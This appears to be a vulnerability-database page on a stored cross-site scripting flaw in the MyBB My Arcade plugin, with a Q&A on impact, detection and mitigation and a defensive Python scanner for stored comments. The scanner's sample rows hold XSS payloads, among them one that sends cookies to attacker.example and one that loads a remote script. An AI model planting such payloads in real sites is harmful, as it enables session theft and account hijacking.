CVE-2018-25249
Persistent XSS in MyBB My Arcade Plugin via Score Comments
Publication date: 2026-04-04
Last updated on: 2026-04-10
Assigner: VulnCheck
Description
CVSS Scores
EPSS Scores
Meta Information
Affected Vendors & Products
| Vendor | Product | Version / Range |
|---|---|---|
| mybb | my_arcade | 1.3 |
Helpful Resources
Exploitability
| CWE ID | Description |
|---|---|
| CWE-79 | The product does not neutralize or incorrectly neutralizes user-controllable input before it is placed in output that is used as a web page that is served to other users. |
Attack-Flow Graph
AI Powered Q&A
Can you explain this vulnerability to me?
CVE-2018-25249 is a persistent (stored) cross-site scripting vulnerability in the MyBB My Arcade plugin, version 1.3 and earlier. An authenticated forum user can inject HTML and JavaScript into an arcade game's score comments.
Because the comment text is stored without proper encoding and later rendered as markup, the payload executes in the browser of every user who views or edits the comment, not just the one who submitted it.
The root cause is the one described by CWE-79: the plugin does not neutralize user-controllable input before placing it in a page served to other users.
How can this vulnerability impact me?
Anyone who views or edits a poisoned comment runs attacker-chosen JavaScript in the context of the forum, with their own session.
Depending on the payload, that means theft of session cookies or credentials, actions performed as the victim (session riding), defacement of the page, or a foothold for further attacks.
Only an ordinary authenticated account is needed to plant the payload, so any registered member can exploit it; the higher-value victims are moderators and administrators who review the comments, since the script then runs with their privileges.
How can this vulnerability be detected on my network or system? Can you suggest some commands?
Because the payload is stored, the most reliable check is to inspect the comment rows themselves for injected markup rather than to look for the vulnerability in network traffic alone.
A practical approach is to search the database (or, failing that, the web interface) for script tags, inline event handlers, and javascript: URIs in the comment fields.
- Query the comments table directly, for example: SELECT * FROM myarcade_comments WHERE comment LIKE '%<script>%'; (the table and column names here are illustrative: the real names depend on the plugin's schema and your MyBB table prefix, and a bare '%<script>%' filter misses variants such as <script src=...>, event-handler attributes like onerror=, and javascript: links, so widen the search beyond this one pattern).
- Use a web application scanner, or test manually by posting a crafted comment containing a script tag and checking whether it executes when viewed or edited; do this only on a non-production copy of the forum you are authorized to test, since the payload persists for every other user.
- Monitor HTTP traffic for suspicious payloads in POST requests to the comment submission endpoints; this catches new injection attempts but not comments already stored.
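The following script, added here as an example and not part of the original page or the My Arcade plugin, shows the kind of stored-payload scan the list above describes. It builds a constructed in-memory copy of a comments table (the table and column names myarcade_comments, cid, uid and comment, and all rows, are assumptions for illustration), runs several case-insensitive indicator patterns over each comment, and compares the result with the single LIKE '%<script>%' filter to show what that filter misses.

```python
"""Scan stored arcade score comments for persistent-XSS indicators.

Added example: not code from the My Arcade plugin or from MyBB. The table
name, column names and sample rows are constructed for illustration; point
the scan at a read-only copy of the real table and adjust the names.
"""
import re
import sqlite3
from typing import Dict, List

# Indicators for the common stored-XSS vectors. A LIKE '%<script>%' filter
# only finds a literal <script> tag; it misses tags with attributes
# (<script src=...>), inline event handlers and javascript: URIs.
XSS_PATTERNS = {
    "script_tag": re.compile(r"<\s*script\b", re.IGNORECASE),
    "event_handler": re.compile(r"\bon[a-z]+\s*=", re.IGNORECASE),
    "javascript_uri": re.compile(r"javascript\s*:", re.IGNORECASE),
    "embedding_tag": re.compile(r"<\s*(iframe|object|embed|svg|img)\b", re.IGNORECASE),
}

# Constructed sample rows: (cid, uid, comment). Rows 2, 3, 4, 5 and 7 carry
# payloads; rows 1 and 6 are benign, row 6 deliberately contains a bare '<'.
SAMPLE_ROWS = [
    (1, 10, "Nice score!"),
    (2, 11, "<script>fetch('https://attacker.example/?c='+document.cookie)</script>"),
    (3, 12, '<img src=x onerror="alert(1)">'),
    (4, 13, "<ScRiPt>alert(1)</ScRiPt>"),
    (5, 14, '<a href="javascript:alert(1)">click</a>'),
    (6, 15, "I scored 5 < 10, lol"),
    (7, 16, '<script src="https://attacker.example/x.js"></script>'),
]


def build_sample_db() -> sqlite3.Connection:
    """Create an in-memory table shaped like a plugin comments table (assumed schema)."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE myarcade_comments (cid INTEGER PRIMARY KEY, uid INTEGER, comment TEXT)"
    )
    conn.executemany("INSERT INTO myarcade_comments VALUES (?, ?, ?)", SAMPLE_ROWS)
    conn.commit()
    return conn


def classify(comment: str) -> List[str]:
    """Return the names of every indicator pattern that matches the comment."""
    return [name for name, pattern in XSS_PATTERNS.items() if pattern.search(comment)]


def scan_comments(conn: sqlite3.Connection) -> List[Dict]:
    """Read every comment and report those with at least one XSS indicator."""
    findings = []
    for cid, uid, comment in conn.execute("SELECT cid, uid, comment FROM myarcade_comments"):
        hits = classify(comment)
        if hits:
            findings.append({"cid": cid, "uid": uid, "indicators": hits, "comment": comment})
    return findings


def like_filter_count(conn: sqlite3.Connection) -> int:
    """The naive single-pattern check from the text, for comparison."""
    (count,) = conn.execute(
        "SELECT COUNT(*) FROM myarcade_comments WHERE comment LIKE '%<script>%'"
    ).fetchone()
    return count


if __name__ == "__main__":
    db = build_sample_db()
    print(f"LIKE '%<script>%' flags {like_filter_count(db)} row(s)")
    for finding in scan_comments(db):
        print(f"cid={finding['cid']} uid={finding['uid']} {finding['indicators']}: {finding['comment']}")
```

On the constructed data the LIKE filter flags two rows while the pattern scan flags five; the rows it misses are exactly the event-handler, javascript: and <script src=...> variants. Whether LIKE is case-sensitive depends on the database collation (SQLite and MySQL's default collations are not), so the regex flags are set explicitly rather than relying on that. Run the scan against a dump or read replica, never by testing payloads on the live forum.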
What immediate steps should I take to mitigate this vulnerability?
The immediate mitigation is to upgrade the MyBB My Arcade plugin to a release in which comment input is properly neutralized before output; this entry names version 1.3.1 or later, so confirm the fixed version against the plugin's own release notes before relying on it.
If upgrading is not immediately possible, disable score comments or restrict adding and editing them to trusted user groups.
Web application firewall (WAF) rules that block common XSS payloads in comment submissions reduce exposure but are a stopgap only, since filter bypasses for stored XSS are routine.
Telling users to be cautious offers little protection, because the payload fires simply on viewing the comment. Instead, review existing comments for injected markup and remove any you find: if the fix only filters new input, payloads already stored in the database keep executing after the upgrade.
How does this vulnerability affect compliance with common standards and regulations (like GDPR, HIPAA)?
The available information does not indicate any direct compliance impact of this persistent XSS vulnerability in the MyBB My Arcade plugin under standards and regulations such as GDPR or HIPAA.